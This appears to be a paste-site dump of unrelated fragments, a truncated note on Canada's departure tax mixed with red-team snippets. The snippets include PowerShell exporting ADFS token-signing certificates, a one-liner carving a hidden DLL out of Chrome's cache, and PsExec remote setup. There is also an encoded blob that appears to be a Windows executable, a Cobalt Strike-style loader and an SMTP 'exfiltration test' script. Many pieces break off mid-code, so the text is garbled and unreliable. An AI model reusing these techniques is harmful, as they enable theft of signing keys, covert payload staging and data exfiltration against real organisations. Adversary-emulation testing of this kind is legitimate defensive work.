justaguywhocodes

Canada does impose a "departure tax" on individuals who permanently emigrate and cease to be tax residents. This is not a flat fee but rather a capital gains tax triggered by a "deemed disposition" of assets under the Income Tax Act. It's designed to tax unrealized gains that accrued while you were a Canadian resident. Here's a breakdown of how it works, based on current rules as of 2026.When It AppliesThe departure tax kicks in when you become a non-resident of Canada for tax purposes. This typically happens if you sever residential ties (e.g., sell your home, move family abroad, spend less than 183 days in Canada annually, and establish residency elsewhere).
It's applied in the year you emigrate, on the date you cease residency.

Canada taxes your worldwide income up to the departure date as a resident, and only Canadian-sourced income afterward as a non-resident.
If you return to Canada within five years, you may be able to unwind some effects, but that's case-specific. 


Assets Affected and ExceptionsDee

justaguywhocodes

# Retrieve Token-Signing Certificate
$signingCert = Get-AdfsCertificate -CertificateType "Token-Signing"
Export-PfxCertificate -Cert $signingCert.Certificate -FilePath "C:\temp\ADFS_Signing.pfx" -Password (ConvertTo-SecureString -String "YourSecurePassword!" -Force -AsPlainText)

# Retrieve Token-Decrypting Certificate
$decryptingCert = Get-AdfsCertificate -CertificateType "Token-Decrypting"
Export-PfxCertificate -Cert $decryptingCert.Certificate -FilePath "C:\temp\ADFS_Decrypting.pfx" -Password (ConvertTo-SecureString -String "YourSecurePassword!" -Force -AsPlainText)

justaguywhocodes

$d="$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Cache\Cache_Data\"; if (Test-Path $d) { gci $d -File | ForEach-Object { try { $s = [System.Text.Encoding]::Default.GetString([System.IO.File]::ReadAllBytes($_.FullName)); if ($s -match '(?s)INDLL(?<content>.*?)OUTDLL') { [System.IO.File]::WriteAllBytes("$d\hello.dll", [System.Text.Encoding]::Default.GetBytes($matches['content'])); Write-Host " found in $($_.Name). Extracted to $d\hello.dll"; break } } catch { Write-Warning "Error processing $($_.Name): $_" } }; if (!$?) { Write-Host "No matches found" } }

justaguywhocodes

Step 0: Pre-requisites - Enable Remote Administration on the Remote Machine
We need to ensure the remote machine allows remote administration. We'll do:

0.1 Enable File and Printer Sharing (SMB) and Remote Administration exceptions in Windows Firewall.
We can use netsh to enable the firewall rules. We'll run these commands on the remote machine. Since we are testing, we can use PsExec to run these commands remotely.

Note: This step might already be done in your environment. If you are in a lab and the firewall is off, you can skip. But for completeness:

cmd
Copy

justaguywhocodes

// testdll.c
// Simple Windows DLL that exports a function compatible with rundll32.exe
// When called via rundll32.exe testdll.dll,ExecuteTest
// it writes "test executed" to C:\Users\Public\Downloads\test.txt

#include <windows.h>
#include <stdio.h>

// Exported function (rundll32-compatible signature)
extern "C" __declspec(dllexport) void CALLBACK ExecuteTest(

justaguywhocodes

VFZxUUFBTUFBQUFFQUFBQS8vOEFBTGdBQUFBQUFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFDQUVBQUE0ZnVnNEF0QW5OSWJnQlRNMGhWR2hwY3lCd2NtOW5jbUZ0SUdOaGJtNXZkQ0JpWlNCeWRXNGdhVzRnUkU5VElHMXZaR1V1RFEwS0pBQUFBQUFBQUFDdUVMaXo2bkhXNE9weDF1RHFjZGJnNHdsRjRPNXgxdUJ0K05maDZYSFc0RzM0MWVIcGNkYmdiZmpTNGVKeDF1QnQrTlBoNFhIVzRKUHcxK0hvY2RiZzZuSFg0TTl4MXVCOCtOL2g2SEhXNEh6NDF1SHJjZGJnZlBncDRPdHgxdUI4K05UaDYzSFc0RkpwWTJqcWNkYmdBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQVVFVUFBR1NHQmdBSUducHBBQUFBQUFBQUFBRHdBQ0lnQ3dJT0xBQVNBQUFBSEFBQUFBQUFBQ1FVQUFBQUVBQUFBQUFBZ0FFQUFBQUFFQUFBQUFJQUFBWUFBQUFBQUFBQUJnQUFBQUFBQUFBQWdBQUFBQVFBQUFBQUFBQUNBR0FCQUFBUUFBQUFBQUFBRUFBQUFBQUFBQUFBRUFBQUFBQUFBQkFBQUFBQUFBQUFBQUFBRUFBQUFBQTVBQUJNQUFBQVREa0FBR1FBQUFBQVlBQUErQUFBQUFCUUFBRFVBUUFBQUFBQUFBQUFBQUFBY0FBQUxBQUFBREF6QUFCd0FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQThERUFBRUFCQUFBQUFBQUFBQUFBQUFBd0FBQUlBUUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFMblJsZUhRQUFBQVlFQUFBQUJBQUFBQVNBQUFBQkFBQUFBQUFBQUFBQUFBQUFBQUFJQUFBWUM1eVpHRjBZUUFB

justaguywhocodes

https://www.visualcapitalist.com/wp-content/uploads/2023/08/global-economy-2023-1200px.jpg

justaguywhocodes

Step-by-Step Commands
Install the PowerForensics Module (if not installed):

powershell
Copy
Install-Module -Name PowerForensics -Force -Confirm:$false -Scope CurrentUser
Create a Test File (e.g., C:\test\malicious.txt):

powershell
Copy

justaguywhocodes

import smtplib
from email.mime.text import MIMEText

# CONFIGURATION (TEST CREDENTIALS ONLY)
sender_email = "derekmartinsf@gmail.com"  # Use a dedicated TEST account
password = "yourpassword"              # Generate an App Password: https://myaccount.google.com/apppasswords
receiver_email = "accounting@bnp.bz"# Destination
smtp_server = "smtp.gmail.com"
port = 587                                   # TLS port
message = "Simulated TrillClient data exfiltration test."

justaguywhocodes

1. Create a Test DLL Loader
Simulate a benign Cobalt Strike-style DLL loader. Save this as test_loader.c:

c
Copy
#include <windows.h>
// Export a function (common in Cobalt Strike loaders)
__declspec(dllexport) void Run(void) {
    // Benign test action: create a temporary file
    HANDLE hFile = CreateFileA("C:\\Windows\\Temp\\test_ttp_success.txt",